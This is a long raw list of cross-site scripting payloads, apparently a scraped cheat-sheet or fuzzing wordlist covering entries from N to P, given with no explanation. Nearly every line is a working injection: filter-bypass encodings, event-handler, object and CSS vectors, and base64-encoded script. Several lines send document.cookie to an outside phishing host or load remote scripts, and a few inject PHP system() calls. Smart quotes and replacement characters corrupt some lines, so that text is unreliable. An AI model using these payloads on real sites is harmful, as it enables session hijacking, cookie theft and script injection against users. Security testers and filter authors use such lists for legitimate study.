<NeatHtmlReplace_IFRAME SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”></NeatHtmlReplace_IFRAME>
<NeatHtmlReplace_INPUT TYPE=”IMAGE” SRC_NeatHtmlReplace=”javascript:alert(‘XSS’);”>
<NeatHtmlReplace_LAYER SRC_NeatHtmlReplace=”http://ha.ckers.org/scriptlet.html"></NeatHtmlReplace_LAYER>
<NeatHtmlReplace_LINK REL=”stylesheet” HREF=”http://ha.ckers.org/xss.css">
<NeatHtmlReplace_LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
<NeatHtmlReplace_OBJECT classid=”clsid:ae24fdae-03c6–11d1–8b76–0080c744f389"><NeatHtmlReplace_param name=”url” value=”javascript:alert(‘XSS’)”></NeatHtmlReplace_OBJECT>
<NeatHtmlReplace_OBJECT TYPE=”text/x-scriptlet” DATA_NeatHtmlReplace=”http://ha.ckers.org/scriptlet.html"></NeatHtmlReplace_OBJECT>
</NeatHtmlReplace_STYLE><A CLASS=”XSS”></A>
<NeatHtmlReplace_STYLE>BODY{-moz-binding:url(“http://ha.ckers.org/xssmoz.xml#xss")}</NeatHtmlReplace_STYLE>
<NeatHtmlReplace_STYLE>@import’http://ha.ckers.org/xss.css';</NeatHtmlReplace_STYLE>
<NeatHtmlReplace_STYLE>@im\port’\ja\vasc\ript:alert(“XSS”)’;</NeatHtmlReplace_STYLE>
<NeatHtmlReplace_STYLE>li {list-style-image:url(“javascript:alert(‘XSS’)”);}</NeatHtmlReplace_STYLE><UL><LI>XSS
<NeatHtmlReplace_STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</NeatHtmlReplace_STYLE>
<NeatHtmlReplace_STYLE TYPE=”text/javascript”>alert(‘XSS’);</NeatHtmlReplace_STYLE>
<NeatHtmlReplace_STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}
<NeatHtmlReplace_TABLE><NeatHtmlParserReset s=’’ d=”” /><script></script><TD BACKGROUND_NeatHtmlReplace=”javascript:alert(‘XSS’)”>
</NeatHtmlReplace_TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
<NeatHtmlReplace_XML ID=”I”><NeatHtmlReplace_X>
<NeatHtmlReplace_XSS STYLE_NeatHtmlReplace=”behavior:url(xss.htc);”>
<NeatHtmlReplace_XSS STYLE_NeatHtmlReplace=”xss:expression(alert(‘XSS’))”>
<NeatHtmlReplace_xss:xss>XSS</NeatHtmlReplace_xss:xss> </NeatHtmlReplace_HTML>
(new Array).filter.constructor(‘alert(1)’)()
new class extends class extends class extends class extends alert(1){}{}{}{}
new Function`al\ert\`6\``;
new Function(location.search.slice(1))();
new Image().src=”http://xssor.io/phishing/cookie.asp?cookie="+escape(document.cookie);
&newLine;javascript:alert(1)
new new new new new`${alert(1)}`
new new new new new alert`1`
new XMLHttpRequest().open(“GET”, “data:text/html,<svg onload=confirm(2)></svg>”, false);
<noembed><img src=”</noembed><iframe onload=alert(1)>” /></noembed>
</noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code>
<noscript><! — </noscript><img src=xx:x onerror=alert(1) →
<noscript><noscript></noscript><script>confirm(1)</script></noscript>
null%22%20style%3d%22background%3aexpression%28confirm%282727%29
o={1.e+1111(){alert(arguments.callee);}};o[1e1111]()//
o={1.e+1111(){alert(arguments.callee);}};o[1e1111]()
<object%20allowscriptaccess=always>%20<param%20name=code%20value=http://renwa.tk/xss.swf>
<object allowscriptaccess=always>
<object allowscriptaccess=”always” data=”test.swf”></object>
Object.bind(null,alert)()(1)
<object classid=”clsid:02BF25D5–8C17–4B23-BC80-D3488ABDDC6B” onqt_error=”alert(1)” style=”behavior:url(#x);”><param name=postdomevents /></object>
<object classid=”clsid:02BF25D5–8C17–4B23-BC80-D3488ABDDC6B” onqt_error=”javascript:alert(1)” style=”behavior:url(#x);”><param name=postdomevents /></object>
<OBJECT CLASSID=”clsid:333C7BC4–460F-11D0-BC04–0080C7055A83"><PARAM NAME=”DataURL” VALUE=”javascript:alert(1)”></OBJECT>
<OBJECT CLASSID=”clsid:333C7BC4–460F-11D0-BC04–0080C7055A83"><PARAM NAME=”DataURL” VALUE=”javascript:alert(1)”></OBJECT><;OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389>;<;param name=url value=javascript:alert(‘;XSS’;)>;<;/OBJECT>;
<;OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389>;<;param name=url value=javascript:alert(‘;XSS’;)>;<;/OBJECT>;
<OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:alert(‘XSS’)></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:alert(XSS)></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><paramname=url value=javascript:alert(‘XSS’)></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:confirm(document.location)></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:document.vulnerable=true></object>
<OBJECT classid=clsid:ae24fdae-03c6–11d1–8b76–0080c744f389><param name=url value=javascript:javascript:alert(1)></OBJECT>
<OBJECT classid=clsid:…” codebase=”javascript:alert(‘XSS’);”>
<object classid=”clsid:…” codebase=”javascript:document.vulnerable=true;”>
<object data=//0me.me/demo/xss/xssproject.swf?js=alert(document.domain);allowscriptaccess=always></object>
<object data=//0me.me/demo/xss/xssproject.swf?js=alert(document.domain); allowscriptaccess=always></object> // Soroush Dallili
<object data=%22data:text/html;base64,PHNjcmlwdD4gdmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpOyB4aHIub3BlbignR0VUJywgJ2h0dHA6Ly94c3NtZS5odG1sNXNlYy5vcmcveHNzbWUyJywgdHJ1ZSk7IHhoci5vbmxvYWQgPSBmdW5jdGlvbigpIHsgYWxlcnQoeGhyLnJlc3BvbnNlVGV4dC5tYXRjaCgvY29va2llID0gJyguKj8pJy8pWzFdKSB9OyB4aHIuc2VuZCgpOyA8L3NjcmlwdD4=%22>
<object data=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==”type=”image/svg+xml”></object>
<object data=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB 4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy 8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml”></object> // Firefox only
<object data=”data:text/html;base64,%(base64)s”>
<object data=’data:text/html;base64,PFNDUklQVD5hbGVydCgnUkVOV0FYMjMnKTs8L1NDUklQVD4=’ /src>
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik></object>
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>?
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object>
><object data=’data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4=’></object>”
“\”\/><object data=’data:text/html;base64,PHNjcmlwdD5hbGVydCgieHNzIik8L3NjcmlwdD4=’></object>”
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4=></object>
<object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=”>
<object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=”> // Firefox only
<object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgvaW5zaWdodC1sYWJzLyk8L3NjcmlwdD4=”>
<object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”>
<object data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object>
<object+data=”data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==”></object>
<object data=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+></object>
<object data=’data:text/xml,<script xmlns=”http://www.w3.org/1999/xhtml “>confirm(1)</script>>’>
<object/data=//goo.gl/nlX0P>
<object/data=//goo.gl/nlX0P?
<object/data=��//goo.gl/nlX0P��>
<object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">?
<object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
“><object data=”http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf">
<OBJECT data=http://xss.ha.ckers.org width=400 height=400 type=text/x-scriptlet”>
<object data=”javascript:alert(0)”>
<object+data=”javascript:alert(0)”>
<object data=”javascript:alert(1)”>
<object data=javascript:alert(1)> *
<object data=javascript:alert(1)>
<object data=javascript:alert(1)>
<object data=javascript:alert(172)>
<object data=”javascript:alert(1)”> // FF <object/data=”javascript&colon;alert(1)”> // FF <object data=”&#x6A;avascript&colon;alert(1)”>
<object data=”javascript:alert(document.domain)”>
<object data=”javascript:alert(XSS)”>
<object/data=”javascript&colon;alert(1)”>
<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
<object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
“/><object data=javascript&colon;\u0061&#x6C;&#101%72t(1)>
<object data=?p=%253Csvg/o%256Eload%253Dalert(1)%253E>
<object data=//pkav/test.swf><param name=movie value=//pkav/test.swf><param name=allowscriptaccess value=always></object>
<object data=”&#x6A;avascript&colon;alert(1)”>
<object data=”&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&# x72;&#x74;&#x28;&#x31;&#x29;”>
<object data=”&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;”>
Object.defineProperties(window,{‘location’:{value:’javascript:alert(1)’}})
Object.defineProperty(location,’href’,{writable:false})
<object id=”x” classid=”clsid:CB927D12–4FF7–4a9e-A169–56E4B8A75598"></object>
<object id=”x” classid=”clsid:CB927D12–4FF7–4a9e-A169–56E4B8A75598"></object> <object classid=”clsid:02BF25D5–8C17–4B23-BC80-D3488ABDDC6B” onqt_error=”javascript:alert(1)” style=”behavior:url(#x);”><param name=postdomevents /></object>
[Object[“keys”](this)[146]](1)
[Object[“keys”](this)[5]](1)
<object onafterscriptexecute=confirm(0)>
<object onbeforeload object onbeforeload=”javascript:javascript:alert(1)”></object onbeforeload>
<object onbeforescriptexecute=confirm(0)>
<object onerror=alert(1)>
<object onerror=javascript:javascript:alert(1)>
<object onError object onError=”javascript:javascript:alert(1)”></object onError>
<object onfocus=popup=1;>
<object><param name=”src” value=
<object><param name=”src” value=”javascript:alert(0)”></param></object>
Object.prototype[Symbol.toStringTag]=’<svg/onload=alert(1)>’;location=’javascript:1+{}’
Object.prototype[Symbol.toStringTag]=’<svg/onload=alert(1)>’;while(1){}location=’javascript:1+{}’
/* →]]>%>?></object></script></title></textarea></noscript></style></xmp>’-/”///><img id=”b1" src=1 onerror=’$.getScript(“http://xss.cx.js", function() { c(); });’>’
<object src=1 href=1 onerror=”javascript:alert(1)”></object>
<object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>
“<object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>”
“><object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>”,
“/><object type=’text/x-html’ data=’javascript:prompt(/xss/.source);var x = prompt;x(0);x(/XSS/.source);x’></object>
<OBJECT TYPE=”text/x-scriptlet” DATA=”http://hacker.com/xss.html">
<;OBJECT TYPE=”;text/x-scriptlet”; DATA=”;http://ha.ckers.org/scriptlet.html";>;<;/OBJECT>;
<OBJECT TYPE=”text/x-scriptlet” DATA=”http://ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT TYPE=”text/x-scriptlet” DATA=”http://ha.ckers.org/scriptlet.html"></OBJECT>
<object type=”text/x-scriptlet” data=”http://jsfiddle.net/XLE63/ “></object>
“/><object type=”text/x-scriptlet” data=”http://jsfiddle.net/XLE63/ “></object>
<OBJECT TYPE=”text/x-scriptlet” DATA=”http://www.securitycompass.com/scriptlet.html"></object>
<OBJECT TYPE=”text/x-scriptlet” DATA=”http://xss.cx/scriptlet.html"></OBJECT>
<OBJECT TYPE=”text/x-scriptlet” DATA=”http://xxxx.com/scriptlet.html"></OBJECT>
<OBJECT TYPE=”text/x-scriptlet” DATA=”%(scriptlet)s”></OBJECT>
* {-o-link:’javascript:alert(1)’;-o-link-source: current;}
/”onafterscriptexecute=alert(‘XSS’) 1=’
“ onblur=alert(1) autofocus a=”
“onblur=alert(1)autofocusa=”
onblur=alert(1) autofocus a=
“ onblur=alert(XSS) “> <”
“onBlur=”&#x061;&#x06c;&#x065;&#x072;&#x074;&#x028;&#x027;&#x058;&#x053;&#x053;&#x027;&#x029;”
_.once(alert(9))
onclick=’addUser(“23&#000000000034)-alert(1)//”)’
onclick=’addUser(“23&quot)alert(1)//”)’
(/* */oNcliCk=alert() )
“onclick=alert(1)//
onclick=alert(1)
‘“/onclick=’alert(1)’/accesskey=’X’
“ onclick=alert(1)//<button ‘ onclick=alert()//>
onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
“ onclick=alert(1)//<button onclick=alert(1)//> */ alert(1)//
“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
�� onclick=alert(1)//<button �� onclick=alert(1)//> */ alert(1)//
onclick=alert(1)//<button �� onclick=alert(1)//> */ alert(1)//
“ onclick=alert(1)//”>click
“ onclick=alert()//<button ‘ onclick=alert()//> */ alert()//<img style=”background-url=eval(onclick)” onclick=alert()>//>
onclick=alert(tagName%2BinnerHTML%2Blocation.hash)>/*click me!#*/alert(1)
“ onclick=alert(XSS) “>
“onclick=”alert(‘XSS’)”
onclick=”delFeedback(‘2&apos)alert(1)//’)”
onclick=”elements[0].value=’<a/href=’%2BURL%2B’>link</a>’;submit()”>
onclick=”elements[0].value=’<a/href=’%2BURL%2B’>link</a>’;submit()”
onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source);
onclick=eval(name) onmouseover=eval(name) onbegin=eval(name) background=javascript:eval(name)//>”
“onContextMenu=”&#x000061;&#x00006c;&#x000065;&#x000072;&#x000074;&#x000028;&#x000027;&#x000058;&#x000053;&#x000053;&#x000027;&#x000029;”
“onCopy=”&#x00061;&#x0006c;&#x00065;&#x00072;&#x00074;&#x00028;&#x00027;&#x00058;&#x00053;&#x00053;&#x00027;&#x00029;”
“oncut=alert(1)
“onDblClick=”&#119;indow[‘aleraaaat’.re&#0112;lace(‘aaaa’,’’)](‘XaaaaSaaaaS’.re&#0112;lace(‘aaaa’,’’).re&#0112;lace(‘aaaa’,’’))”
‘/(ondblclick|onclick|onkeydown|onkeypress|onkeyup|onmousedown|onmousemove|onmouseout|onmouseover|onmouseup|onload|onunload|onerror)=[^<]*(?=\>)/Uis’,
“+onDblClick=prompt(123)”+
?onend=javascript:alert(1)//”,
onerror%3Deval%3Bthrow’%3Dalert%5Cx281%5Cx29'%3B
“onerror=alert(1)//
‘onerror=’alert(‘XSS’)’ a=’.jpg
;onerror=confirm;throw 1;
onerror=confirm;throw 1;
onerror=’eval(atob(“cHJvbXB0KDEpOw==”))’>
onerror=eval;throw’=confirm\x281\x29';
“+onError=prompt(123)”+
one={{set(‘_factoryArgs.0’,’script’)}}
“ onfocus=alert(document.domain) “> <”
“ onfocus=alert(document.domain) “> <”
“ onfocus=alert(XSS) “> <”
“ onfocusin=alert(1) autofocus x=”
“onfocusin=alert(1)autofocus x=”
onfocusin=alert(1) autofocus x=
“onfocusin=”top[‘\x61\x6C\x65\x72\x74’](‘\x58\x53\x53’)”
onfocus=JaVaSCript:alert(123) autofocus
‘ onfocus=JaVaSCript:alert(123) autofocus
“ onfocus=JaVaSCript:alert(123) autofocus
onfocus=location=window.name//&#039;
“ onfocusout=alert(1) autofocus x=”
“onfocusout=alert(1)autofocus x=”
onfocusout=alert(1) autofocus x=
“onfocusout=”parent[String.fromCharCode(500–403,500–392,500–399,500–386,500–384)](String.fromCharCode(300–212,300–217,300–217))”
“+onfocus=”prompt(1)”+
“ onfocus=prompt(1) autofocus fragment=”
“onfocus=”window[‘\141\154\145\162\164’](‘\130\123\123’)”
“ onfocus=”write(unescape(‘&#60;’)+’script src=’+unescape(‘&#34;&#104;&#116;&#116;&#112;&#58;&#47;&#47;’)
“ onhover=”j&#x61;vascript:&#x61;lert(-1)”
“onKeyDown=”&#00112;arent[‘aleraaaaat’.replace(‘aaaaa’,’’)](‘XaaaaaSaaaaaS’.replace(‘aaaaa’,’’).replace(‘aaaaa’,’’))”
onkeydown=function(){ http://window.open ('//example.com/','_blank','a');}
onkeydown=function(){ http://window.open (‘//example.com/’,’_blank’,’a’);
onkeypress=function(){ http://window.open (‘about:blank’,’_blank’).close();}
onkeypress=function(){ http://window.open (‘about:blank’,’_blank’).close();
“+onkeypress=”prompt(23)”+
“onload=”a=document.createElement(‘script’);a.setAttribute(‘src’,String.fromCharCode(104,116,116,112,58,47,47,109,97,108,101,114,105,115,99,104,46,110,101,116,47,97,46,106,115));document.body.appendChild(a)
onload=alert(1)>
‘onload=alert(153)><svg/153=’
‘onload=alert(1)><svg/1=’
onload=confirm(1)//
onload=forms[0].submit()></iframe><form method=POST
“onMouseDown=”&#00097;&#000108;&#000101;&#000114;&#000116;&#00040;&#00039;&#00088;&#00083;&#00083;&#00039;&#00041;”
“onMouseEnter=”&#000097;&#0000108;&#0000101;&#0000114;&#0000116;&#000040;&#000039;&#000088;&#000083;&#000083;&#000039;&#000041;”
“OnMouseEnter=”confirm()//
onmouseenter=prompt(document.domain)
“onMouseLeave=”&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;”
“onMouseMove=”&#097;&#0108;&#0101;&#0114;&#0116;&#040;&#039;&#088;&#083;&#083;&#039;&#041;”
“onMouseOut=”&#0097;&#00108;&#00101;&#00114;&#00116;&#0040;&#0039;&#0088;&#0083;&#0083;&#0039;&#0041;”
onmouseover
On Mouse Over
“onmouseover=”alert(1)
“onmouseover=alert(1)//
“ onmouseover=”alert(4321)” blah=”
“onmouseover=alert(77)//
‘ onmouseover=alert(/Black.Spook/)
“ onmouseover=alert(XSS) “>
“ onmouseover=”confirm(1)”style=”position:absolute;width:100%;height:100%;top:0;left:0;”
‘ onmouseover=confirm(document.location)
onmouseover=”document.cookie=true;”>//INJECTX
“onmouseover=”(new Function(‘rssseturn(alesssrt)’.&#x73plit(‘sss’).joi&#x6e(‘’)))()((‘SXS’+’SXS’).slice(-5,4))”
“ onmouseover=”prompt(0) x=”
“onmouseover=”prompt(0)x=”
onmouseover=prompt(100) bad=’
onmouseover=prompt(document.domain
“+onmouseover=”window.location=’http://localhost'
“onMouseUp=”wi&#110dow[Str&#105;ng.fromC&#104;arCode(501–404,501–393,501–400,501–387,501–385)]&#0000040;&#0000039;&#0000088;&#0000083;&#0000083;&#0000039;&#0000041;”
onreadystatechange=”alert(1)”>1</div>
onreadystatechange=”alert(2)”>2</div>
“+onReset=prompt(123)”+
“onresize=prompt(1)>
onscroll=alert(‘xss’)>
“onSelect=”&#x0061;&#x006c;&#x0065;&#x0072;&#x0074;&#x0028;&#x0027;&#x0058;&#x0053;&#x0053;&#x0027;&#x0029;”
onxxx=yyy
<o/onmouseover=o=prompt,o``>o
open(c2.canvas.toDataURL())
open(‘java’+’script:ale’+’rt(11)’);
open`javascript:alert(1)//#${‘_self’}`
open(name)
open(‘’,’_self’).alert(1)
Opera:<style>*{-o-link:’data:text/html,<svg/onload=alert(/@garethheyes/)>’;-o-link-source:current}</style><a href=1>aaa
<option>’><button><img src=x onerror=confirm(0);></button></option>
“<option>’><button><img src=x onerror=confirm(0);></button></option>”
><option>’><button><img src=x onerror=confirm(1);></button></option>
“\”\/><option>’><button><img src=x onerror=confirm(1);></button></option>”,
oscriptaalert(�FXSS�F)o/scripta
“o<x>nmouseover=alert<x>(1)//
o={x:’’+<s>eva</s>+<s>l</s>,y:’’+<s>aler</s>+<s>t</s>+<s>(1)</s>};function f() { 0[this.x](this.y) }f.call(o);
<p/%0Aonmouseover%0A=%0Aconfirm(1)>renwax23
p=%26p=%26lt;svg/onload=alert(1)><j onclick=location%2B=document.body.textContent>click me!
?page=javascript:alert(1)”
p=-alert(1)}//\
p=`-alert(1)”>’onload=”`<svg/1=’
p=*/alert(1)”>’onload=”/*<svg/1=’
p=*/alert(1)</script><script>/*
p=>alert(1)</script><script/1=
p=’>alert(1)</script><script/1=’
?param1=<script>prompt(9);/*&param2=*/</script>
/?param=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
/?param=javascript:alert(document.cookie)
<param name=url value=https://l0.cm/xss.swf>
$.parseHTML(‘<img src=xx:X onerror=confirm(1)>’)
parseInt(“confirm”,30) == 8680439 && 8680439..toString(30) == “confirm”
parseInt(“prompt”,36);
<path d=”M0,0" style=”marker-start:url(test4.svg#a)”/>
PATH_INFO:/<link rel=import href=”/bypass/path/<script>alert(1)</script>”>
<p class=”comment” title=”*/eval(y);/*” data-comment=’{“id”:1}’></p>
<p class=”comment” title=””onload=’/*”></p>
<p class=”comment” title=”*/prompt(1)’”></p>
<p class=”comment” title=””><script>/*” data-comment=’{“id”:1}’></p>
<p class=”comment” title=”*/</script>” data-comment=’{“id”:1}’></p>
<p class=”comment” title=””><svg/a=”></p>
<p class=”comment” title=”*/x[0]=’a’;/*” data-comment=’{“id”:1}’></p>
<p class=”comment” title=”*/x[1]=’l’;/*” data-comment=’{“id”:1}’></p>
<p class=”comment” title=”*/x[2]=’e’;/*” data-comment=’{“id”:1}’></p>
<p class=”comment” title=”*/x[3]=’r’;/*” data-comment=’{“id”:1}’></p>
<p class=”comment” title=”*/x[4]=’t’;/*” data-comment=’{“id”:1}’></p>
<p class=”comment” title=”*/x[5]=’(‘;/*” data-comment=’{“id”:1}’></p>
<p class=”comment” title=”*/x[6]=’1';/*” data-comment=’{“id”:1}’></p>
<p class=”comment” title=”*/x[7]=’)’;/*” data-comment=’{“id”:1}’></p>
<p class=”comment” title=”*/x=new Array();/*” data-comment=’{“id”:1}’></p>
<p class=”comment” title=”*/y=x.join(‘’);/*” data-comment=’{“id”:1}’></p>
p.coords.longitude+’,Altitude:’+p.coords.altitude);})
perl -e &#039;print \”;<;IMG SRC=java\0script:alert(\”;XSS\”;)>;\”;;&#039; >; out
perl -e &#039;print \&quot;&lt;IMG SRC=java\0script:alert(\&quot;XSS\&quot;)&gt;\&quot;;&#039; &gt; out
perl -e &#039;print \&quot;&lt;SCR\0IPT&gt;alert(\&quot;XSS\&quot;)&lt;/SCR\0IPT&gt;\&quot;;&#039; &gt; out
perl -e &#039;print \”;<;SCR\0IPT>;alert(\”;XSS\”;)<;/SCR\0IPT>;\”;;&#039; >; out
perl -e &apos;print &quot;&amp;&lt;SCR\0IPT&gt;alert(&quot;XSS&quot;)&lt;/SCR\0IPT&gt;&quot;;&apos; &gt; out
perl -e &apos;print &quot;&lt;IMG SRC=java\0script:alert(&quot;XSS&quot;)>&quot;;&apos;&gt; out
perl -e ‘print “<IMG id=XSS SRC=java\0script:alert(\”XSS\”)>”;’ > out
perl -e ‘print “<IMG />”;’ > out
perl -e ‘print “<IMG SRC=java\0script:alert(“XSS”)>”;’> out
perl -e ‘print “<IMG SRC=java\0script:alert(“XSS”)>”;’ > out
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
perl -e ‘print \”<IMG SRC=java\0script:alert(\”XSS\”)>\”;’ > out
perl -e ‘print “<IMG SRC_NeatHtmlReplace=”java\0script:alert(\&quot;XSS\&quot;)”>”;’ > out
perl -e ‘;print “;<;IM SRC=java\0script:alert(“;XSS”;)>”;;’;>; out
perl -e ‘print \”&lt;IMG SRC=java\0script&#058;alert(\\”XSS\\”)&gt;\”;’ &gt; out
perl -e ‘print \”&lt;SCR\0IPT&gt;alert(\\”XSS\\”)&lt;/SCR\0IPT&gt;\”;’ &gt; out
perl -e ‘print “&lt;SCR\0IPT&gt;alert(\”XSS\”)&lt;/SCR\0IPT&gt;”;’ > out
perl -e ‘print “<NeatHtmlLt />&lt;SCR\0IPT>alert(\”XSS\”)<NeatHtmlLt />&lt;/SCR\0IPT>”;’ > out
perl -e ‘;print “;&;<;SCR\0IPT>;alert(“;XSS”;)<;/SCR\0IPT>;”;;’; >; out
perl -e ‘print “<SCR\0IPT>alert(“XSS”)</SCR\0IPT>”;’ > out
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
perl -e ‘print “&<SCR\0IPT>alert(“XSS”)</SCR\0IPT>”;’ > out
perl -e ‘print \”<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>\”;’ > out
?pg=javascript:alert(1)”,
<p hidden?={{hidden}}>123</p>
PHNjcmlwdD5hbGVydCgnWFNTIScpPC9zY3JpcHQ+
PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
PHP a = val2
<?php echo $_SERVER[‘PHP_SELF’]?>
<?php header(“Access-Control-Allow-Origin: *”); ?>
<?php header(��Access-Control-Allow-Origin: *��); ?>
<?php header(Access-Control-Allow-Origin: *); ?>
<?php header(‘content-type:text/html;charset=utf-7-utf-8-shift_jis’);?>
phpmyadmin/js/canvg/flashcanvas.swf?id=test\));}catch(e){alert(document.domain)}//
“><p/id=1%0Aonmousemove%0A=%0Aconfirm`1`>hoveme
“><p id=””onmouseover=\u0070rompt(1) //
<p id=”x”>AAA</p>
<p id=x>javascrip<x>t:alert(<x>1)</p><math><a href=”#*/=x.innerText,a” xml:base=javascript:location/*>Click HERE
<p id=x>javascrip<x>t:alert(<x>2)</p><math><a href=”#*/=x.innerText,a” xml:base=javascript:location/*>Click HERE
<p><img class=”reference” contenteditable=”false” data-refid=”2" data-type=”reference” onerror=”eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,41,46,115,114,99,61,34,104,116,116,112,58,47,47,120,115,115,56,46,110,101,116,47,63,99,61,81,105,104,97,76,34))” src=”http://img.baidu.com/img/baike/editor/reference.gif" unselectable=”on” /></p>
<p><img src=”https://attacker/?data=</p>
p=<j%26p=<svg%2Bonload=alert(1) onclick=location%2B=outerHTML>click me!
p=<j onclick=location%2B=textContent>%26p=%26lt;svg/onload=alert(1)>
p=<j onclick=location=textContent>?p=%26lt;svg/onload=alert(1)>
<pkav xmlns=”><iframe onload=alert(1)”>123</pkav>
<plaintext>
<plaintext/onmousemove=prompt(1)>renwa
</plaintext\></|\><plaintext/onmouseover=prompt(1)
?playerID=a\”;))}catch(e){confirm(document.domain)}//
?playerready=alert(document.cookie)
player.swf?playerready=alert(document.cookie)
player.swf?tracecall=alert(document.cookie)
plupload.flash.swf?%#target%g=alert&uid%g=XSS&
<p onbeforescriptexecute=”alert(1)”><svg><script>\</p>
<p/onclick=alert(/INJECTX/)>a
<p oncut=alert(1)>A
<p/oncut=alert(1)>A
p=’onload=alert(1)><svg/1=’
<p onmouseover=alert(/1/)>xxx</p>
<p/onmouseover=javascript:alert(1); >M</p>
{{[].pop.constructor(‘alert()’)()}}
p=\&q=-alert(1)//
preg_replace(/on\w+\s*=|\>/i, -, $_REQUEST[q]);
preg_replace(/\<script|=/i, -, $_REQUEST[q]);
prerequisite: \” => \\\”
previousSibling.nodeValue, document.body.textContent*
print ctx.eval(u”’\N{HEAVY BLACK HEART}’”)
${@print(system(a?whoamia?))}
${@print(system(��dir��))}
${@print(system($_SERVER[‘HTTP_USER_AGENT’]))}
process.open(“/Applications/Calculator.app/Contents/MacOS/Calculator”);
prompt(0x0064)
‘?prompt`1`?’
‘*prompt(1)*’
p’rompt(1)
prompt(1)-eval(JSON.parse(name).input)
“(prompt(1))in”
;prompt(1)//��;prompt(2)//��;prompt(3)//�V></SCRIPT>��>��><SCRIPT>prompt(4)</SCRIPT>
“^prompt(9)^”
“<<prompt(9)<<”
“<=prompt(9)<=”
“<prompt(9)<”
“===prompt(9)===”
